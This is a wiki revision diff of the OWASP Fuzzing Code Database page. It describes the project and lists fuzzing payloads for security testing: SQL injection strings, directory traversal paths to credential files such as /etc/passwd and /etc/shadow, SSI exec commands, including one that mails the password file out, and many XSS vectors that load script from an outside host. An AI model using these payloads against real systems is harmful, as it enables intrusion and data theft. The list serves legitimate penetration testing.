Difference between revisions of "Category:OWASP Fuzzing Code Database"

From OWASP
Jump to: navigation, search
Line 1: Line 1:
This database is a collection of several statements used in code injection software. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated.
+
This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added.  
We want to collect all these statements, merging the statements from several projects like [[WebScarab]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results.
+
Please add your own statements and check out the statements already added.  
+
  
==== News ====
+
==== News ====
  
'''02 February 2010''''
+
'''02 February 2010''''  
  
* Created new Category Lotus/Notes Files
+
*Created new Category Lotus/Notes Files
  
'''11 August 2009'''
+
'''11 August 2009'''  
+
* Created new Category: XML Attacks
+
  
''Update Statements''
+
*Created new Category: XML Attacks
  
* 15 new XML Statements
+
''Update Statements''
* 93 new SQL Injections Statements
+
* 67 new Traversal Directory Statements
+
* Delete 33 XSS Statement Duplicate
+
* 30 New XSS Statements
+
  
'''7 August 2009'''
+
*15 new XML Statements
+
*93 new SQL Injections Statements
* Updated the objectives of the project.
+
*67 new Traversal Directory Statements
 +
*Delete 33 XSS Statement Duplicate
 +
*30 New XSS Statements
  
'''21 July 2009'''
+
'''7 August 2009'''  
  
* Set the team responsible for the project.
+
*Updated the objectives of the project.
  
==== Goals ====
+
'''21 July 2009'''
  
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.
+
*Set the team responsible for the project.
  
In addition, the following functionalities will be included on this project:
+
==== Goals  ====
  
1 - The statements of ASDR Project
+
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.
2 - Browser
+
3 - Operational System
+
4 - Databases
+
  
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:
+
In addition, the following functionalities will be included on this project:  
  
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.
+
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases
  
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.
+
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:
  
3 - Possibility to support users on the report of their own experiences with the statements.
+
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.  
  
==== Statements ====
+
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.
  
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111) ===
+
3 - Possibility to support users on the report of their own experiences with the statements.
  
<pre>
+
==== Statements  ====
/852566C90012664F
+
 
 +
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===
 +
<pre>/852566C90012664F
 
/admin4.nsf
 
/admin4.nsf
 
/admin5.nsf
 
/admin5.nsf
Line 164: Line 157:
 
/.nsf/../winnt/win.ini
 
/.nsf/../winnt/win.ini
 
/?Open  
 
/?Open  
</pre>
+
</pre>  
 
+
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126) ===
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126) ===
+
<pre>Statement
 
+
<pre>
+
Statement
+
 
'sqlvuln
 
'sqlvuln
 
'+sqlvuln
 
'+sqlvuln
Line 276: Line 266:
 
to_timestamp_tz
 
to_timestamp_tz
 
tz_offset
 
tz_offset
&lt;&gt;&quot;'%;)(&amp;+
+
&lt;&gt;"'%;)(&amp;+
 
'%20or%201=1
 
'%20or%201=1
 
%27%20or%201=1
 
%27%20or%201=1
Line 282: Line 272:
 
%20'sleep%2050'
 
%20'sleep%2050'
 
char%4039%41%2b%40SELECT
 
char%4039%41%2b%40SELECT
&apos;%20OR
+
&amp;apos;%20OR
 
'sqlattempt1
 
'sqlattempt1
 
(sqlattempt2)
 
(sqlattempt2)
Line 297: Line 287:
 
)
 
)
 
%29
 
%29
&
+
&amp;
 
%26
 
%26
 
!
 
!
Line 312: Line 302:
 
' or 3=3
 
' or 3=3
 
‘ or 3=3 --
 
‘ or 3=3 --
</pre>
+
</pre>  
 
+
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4) ===
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4) ===
+
<pre>&lt;!--#exec cmd="/bin/ls /" --&gt;&lt;br/&gt;
 
+
&lt;!--#exec cmd="cat /etc/passwd" --&gt;&lt;br/&gt;
<pre>
+
&lt;!--#exec cmd="find / -name *.* -print" --&gt;&lt;br/&gt;
<!--#exec cmd="/bin/ls /" --><br/>
+
&lt;!--#exec cmd="mail Foobar@email.de &lt;mailto:Foobar@email.de&gt; &lt; cat /etc/passwd" --&gt;&lt;br/&gt;
<!--#exec cmd="cat /etc/passwd" --><br/>
+
</pre>  
<!--#exec cmd="find / -name *.* -print" --><br/>
+
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/>
+
<pre>Statement
</pre>
+
 
+
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===
+
 
+
<pre>
+
Statement
+
 
\..\WINDOWS\win.ini
 
\..\WINDOWS\win.ini
 
\..\..\WINDOWS\win.ini
 
\..\..\WINDOWS\win.ini
Line 434: Line 418:
 
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
 
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
 
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
 
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
\\&apos;/bin/cat%20/etc/passwd\\&apos;
+
\\&amp;apos;/bin/cat%20/etc/passwd\\&amp;apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
+
\\&amp;apos;/bin/cat%20/etc/shadow\\&amp;apos;
 
../../../../../../../../conf/server.xml
 
../../../../../../../../conf/server.xml
 
/../../../../../../../../bin/id|
 
/../../../../../../../../bin/id|
Line 459: Line 443:
 
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
 
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
 
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
 
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
</pre>
+
</pre>  
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".''
+
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".''  
  
=== XSS Statements - Most effective/most common statements ===
+
=== XSS Statements - Most effective/most common statements ===
  
Testing Statements
+
Testing Statements  
<pre>
+
<pre>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
+
'';!--"&lt;XSS&gt;=&amp;{()}
'';!--"<XSS>=&{()}
+
</pre>  
</pre>
+
Common exploit code (covers a lot of XSS vulnerabilities)  
 
+
<pre>'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt='
Common exploit code (covers a lot of XSS vulnerabilities)
+
"&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt="
<pre>
+
\'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt=\'
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
+
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
+
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
+
 
'); alert('xss'); var x='
 
'); alert('xss'); var x='
 
\\'); alert(\'xss\');var x=\'
 
\\'); alert(\'xss\');var x=\'
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
+
//--&gt;&lt;/SCRIPT&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83));
</pre>
+
</pre>  
 
+
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162)  
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162)
+
<pre>Statements
 
+
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
<pre>
+
"&lt;IMG SRC=""javascript:alert('XSS');""&gt;"
Statements
+
&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
+
"&lt;IMG SRC=javascript:alert(""XSS"")&gt;"
"<IMG SRC=""javascript:alert('XSS');"">"
+
"&lt;IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`&gt;"
<IMG SRC=JaVaScRiPt:alert('XSS')>
+
"&lt;IMG """"""&gt;&lt;SCRIPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;"
"<IMG SRC=javascript:alert(""XSS"")>"
+
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
"<IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`>"
+
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
"<IMG """"""><SCRIPT>alert(""XSS"")</SCRIPT>"">"
+
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+
"&lt;IMG SRC=""jav"
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
+
"ascript:alert('XSS');""&gt;"
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+
"perl -e 'print ""&lt;IMG SRC=java\0script:alert(\""XSS\"")&gt;"";' &gt; out"
"<IMG SRC=""jav"
+
"perl -e 'print ""&lt;SCR\0IPT&gt;alert(\""XSS\"")&lt;/SCR\0IPT&gt;"";' &gt; out"
"ascript:alert('XSS');"">"
+
"&lt;IMG SRC="" &amp;#14;  javascript:alert('XSS');""&gt;"
"perl -e 'print ""<IMG SRC=java\0script:alert(\""XSS\"")>"";' > out"
+
"&lt;SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
"perl -e 'print ""<SCR\0IPT>alert(\""XSS\"")</SCR\0IPT>"";' > out"
+
"&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(""XSS"")&gt;"
"<IMG SRC="" &#14;  javascript:alert('XSS');"">"
+
"&lt;SCRIPT/SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
"<SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
"&lt;&lt;SCRIPT&gt;alert(""XSS"");//&lt;&lt;/SCRIPT&gt;"
"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(""XSS"")>"
+
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;
"<SCRIPT/SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
"<<SCRIPT>alert(""XSS"");//<</SCRIPT>"
+
"&lt;IMG SRC=""javascript:alert('XSS')"""
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
+
&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;
<SCRIPT SRC=//ha.ckers.org/.j>
+
&lt;SCRIPT&gt;a=/XSS/\nalert(a.source)&lt;/SCRIPT&gt;
"<IMG SRC=""javascript:alert('XSS')"""
+
<iframe src=http://ha.ckers.org/scriptlet.html <
+
<SCRIPT>a=/XSS/\nalert(a.source)</SCRIPT>
+
 
"\"";alert('XSS');//"
 
"\"";alert('XSS');//"
"</TITLE><SCRIPT>alert(""XSS"");</SCRIPT>"
+
"&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(""XSS"");&lt;/SCRIPT&gt;"
"<INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');"">"
+
"&lt;INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');""&gt;"
"<BODY BACKGROUND=""javascript:alert('XSS')"">"
+
"&lt;BODY BACKGROUND=""javascript:alert('XSS')""&gt;"
<BODY ONLOAD=alert('XSS')>
+
&lt;BODY ONLOAD=alert('XSS')&gt;
"<IMG DYNSRC=""javascript:alert('XSS')"">"
+
"&lt;IMG DYNSRC=""javascript:alert('XSS')""&gt;"
"<IMG LOWSRC=""javascript:alert('XSS')"">"
+
"&lt;IMG LOWSRC=""javascript:alert('XSS')""&gt;"
"<BGSOUND SRC=""javascript:alert('XSS');"">"
+
"&lt;BGSOUND SRC=""javascript:alert('XSS');""&gt;"
"<BR SIZE=""&{alert('XSS')}"">"
+
"&lt;BR SIZE=""&amp;{alert('XSS')}""&gt;"
"<LAYER SRC=""http://ha.ckers.org/scriptlet.html""></LAYER>"
+
"&lt;LAYER SRC=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/LAYER&gt;"
"<LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');"">"
+
"&lt;LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');""&gt;"
"<LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css"">"
+
"&lt;LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css""&gt;"
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
+
&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;
"<META HTTP-EQUIV=""Link"" Content=""<http://ha.ckers.org/xss.css>; REL=stylesheet"">"
+
"&lt;META HTTP-EQUIV=""Link"" Content=""&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet""&gt;"
"<STYLE>BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}</STYLE>"
+
"&lt;STYLE&gt;BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}&lt;/STYLE&gt;"
"<XSS STYLE=""behavior: url(xss.htc);"">"
+
"&lt;XSS STYLE=""behavior: url(xss.htc);""&gt;"
"<STYLE>li {list-style-image: url(""javascript:alert('XSS')"");}</STYLE><UL><LI>XSS"
+
"&lt;STYLE&gt;li {list-style-image: url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS"
"<IMG SRC='vbscript:msgbox(""XSS"")'>"
+
"&lt;IMG SRC='vbscript:msgbox(""XSS"")'&gt;"
 
¼script¾alert(¢XSS¢)¼/script¾
 
¼script¾alert(¢XSS¢)¼/script¾
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');"">"
+
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');""&gt;"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"">"
+
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K""&gt;"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');"">"
+
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');""&gt;"
"<IFRAME SRC=""javascript:alert('XSS');""></IFRAME>"
+
"&lt;IFRAME SRC=""javascript:alert('XSS');""&gt;&lt;/IFRAME&gt;"
"<FRAMESET><FRAME SRC=""javascript:alert('XSS');""></FRAMESET>"
+
"&lt;FRAMESET&gt;&lt;FRAME SRC=""javascript:alert('XSS');""&gt;&lt;/FRAMESET&gt;"
"<TABLE BACKGROUND=""javascript:alert('XSS')"">"
+
"&lt;TABLE BACKGROUND=""javascript:alert('XSS')""&gt;"
"<TABLE><TD BACKGROUND=""javascript:alert('XSS')"">"
+
"&lt;TABLE&gt;&lt;TD BACKGROUND=""javascript:alert('XSS')""&gt;"
"<DIV STYLE=""background-image: url(javascript:alert('XSS'))"">"
+
"&lt;DIV STYLE=""background-image: url(javascript:alert('XSS'))""&gt;"
"<DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"">"
+
"&lt;DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029""&gt;"
"<DIV STYLE=""background-image: url(&#1;javascript:alert('XSS'))"">"
+
"&lt;DIV STYLE=""background-image: url(&amp;#1;javascript:alert('XSS'))""&gt;"
"<DIV STYLE=""width: expression(alert('XSS'));"">"
+
"&lt;DIV STYLE=""width: expression(alert('XSS'));""&gt;"
"<STYLE>@im\port'\ja\vasc\ript:alert(""XSS"")';</STYLE>"
+
"&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(""XSS"")';&lt;/STYLE&gt;"
"<IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))"">"
+
"&lt;IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))""&gt;"
"<XSS STYLE=""xss:expression(alert('XSS'))"">"
+
"&lt;XSS STYLE=""xss:expression(alert('XSS'))""&gt;"
"exp/*<A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'>"
+
"exp/*&lt;A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'&gt;"
"<STYLE TYPE=""text/javascript"">alert('XSS');</STYLE>"
+
"&lt;STYLE TYPE=""text/javascript""&gt;alert('XSS');&lt;/STYLE&gt;"
"<STYLE>.XSS{background-image:url(""javascript:alert('XSS')"");}</STYLE><A CLASS=XSS></A>"
+
"&lt;STYLE&gt;.XSS{background-image:url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;"
"<STYLE type=""text/css"">BODY{background:url(""javascript:alert('XSS')"")}</STYLE>"
+
"&lt;STYLE type=""text/css""&gt;BODY{background:url(""javascript:alert('XSS')"")}&lt;/STYLE&gt;"
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
+
&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;&lt;![endif]--&gt;
"<BASE HREF=""javascript:alert('XSS');//"">"
+
"&lt;BASE HREF=""javascript:alert('XSS');//""&gt;"
"<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""></OBJECT>"
+
"&lt;OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/OBJECT&gt;"
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
+
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;
"<EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""></EMBED>"
+
"&lt;EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"
"<EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""></EMBED>"
+
"&lt;EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
+
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"
"<XML ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+
"&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"
"<XML ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></XML><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN>"
+
"&lt;XML ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;"
"<XML SRC=""xsstest.xml"" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+
"&lt;XML SRC=""xsstest.xml"" ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"
"<HTML><BODY><?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""><?import namespace=""t"" implementation=""#default#time2""><t:set attributeName=""innerHTML"" to=""XSS<SCRIPT DEFER>alert(""XSS"")</SCRIPT>""></BODY></HTML>"
+
"&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""&gt;&lt;?import namespace=""t"" implementation=""#default#time2""&gt;&lt;t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT DEFER&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;&lt;/BODY&gt;&lt;/HTML&gt;"
"<SCRIPT SRC=""http://ha.ckers.org/xss.jpg""></SCRIPT>"
+
"&lt;SCRIPT SRC=""http://ha.ckers.org/xss.jpg""&gt;&lt;/SCRIPT&gt;"
"<!--#exec cmd=""/bin/echo '<SCR'""--><!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'""-->"
+
"&lt;!--#exec cmd=""/bin/echo '&lt;SCR'""--&gt;&lt;!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'""--&gt;"
"<? echo('<SCR)';echo('IPT>alert(""XSS"")</SCRIPT>'); ?>"
+
"&lt;? echo('&lt;SCR)';echo('IPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;');&nbsp;?&gt;"
"<META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCRIPT>alert('XSS')</SCRIPT>"">"
+
"&lt;META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;""&gt;"
"<HEAD><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"
+
"&lt;HEAD&gt;&lt;META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"
"<SCRIPT a="">"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
"&lt;SCRIPT a=""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
"<SCRIPT ="">"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
"&lt;SCRIPT =""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
"<SCRIPT a="">"" '' SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
"&lt;SCRIPT a=""&gt;"" '' SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
"<SCRIPT ""a='>'"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
"&lt;SCRIPT ""a='&gt;'"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
"<SCRIPT a=`>` SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
"&lt;SCRIPT a=`&gt;` SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
"<SCRIPT a="">'>"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
"&lt;SCRIPT a=""&gt;'&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
"<SCRIPT>document.write(""<SCRI"");</SCRIPT>PT SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
"&lt;SCRIPT&gt;document.write(""&lt;SCRI"");&lt;/SCRIPT&gt;PT SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
"<A HREF=""http://66.102.7.147/"">XSS</A>"
+
"&lt;A HREF=""http://66.102.7.147/""&gt;XSS&lt;/A&gt;"
"<A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"">XSS</A>"
+
"&lt;A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D""&gt;XSS&lt;/A&gt;"
"<A HREF=""http://1113982867/"">XSS</A>"
+
"&lt;A HREF=""http://1113982867/""&gt;XSS&lt;/A&gt;"
"<A HREF=""http://0x42.0x0000066.0x7.0x93/"">XSS</A>"
+
"&lt;A HREF=""http://0x42.0x0000066.0x7.0x93/""&gt;XSS&lt;/A&gt;"
"<A HREF=""http://0102.0146.0007.00000223/"">XSS</A>"
+
